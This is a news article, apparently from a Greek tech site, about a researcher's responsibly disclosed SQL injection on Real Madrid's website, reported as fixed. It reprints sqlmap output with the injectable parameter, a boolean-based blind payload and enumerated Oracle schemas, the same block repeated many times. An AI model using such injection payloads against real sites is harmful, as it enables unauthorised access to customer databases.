Real Madrid: SQL Injection by Greek researcher


Greek researcher managed to identify a significant security gap in the official website of Real Madrid, which allowed him to perform SQL injection successfully and gain access to the team database.

real madrid wallpaper preview

On October 10, the Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate and the problem was fixed within a few hours.

It is worth noting that the base of the website had over 7.000 tables and many important items such as millions of customer accounts from the official store of the team.

Some vulnerability information:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table] + ——————————– +
| RLM $ PARSEDCOND |
+ ——————————– +
Database: XDB
[2 tables] + ——————————– +
| XDB $ IMPORT_TT_INFO |
| XDB $ XIDX_IMP_T |
+ ——————————– +

Database: APEX_030200
[3 tables] + ——————————– +
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+ ——————————– +
Database: SYSTEM
[4 tables] + ——————————– +
| HELP |
| OL $ |
| OL $ HINTS |
| OL $ NODES |
+ ——————————– +
Database: FATWIREDLV
[3437 tables] + ——————————– +
Database: SYS
[26 tables] + ——————————– +
Database: MDSYS
[35 tables] + ——————————– +

Awareness of vulnerabilities discovered in organizations is considered extremely necessary
(especially when they are on high traffic websites), and for us they are an immediate priority.

Registration in iGuRu.gr via Email

Enter your email to subscribe to the email notification service for new posts.

 


Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News iGuRu.gr at Google news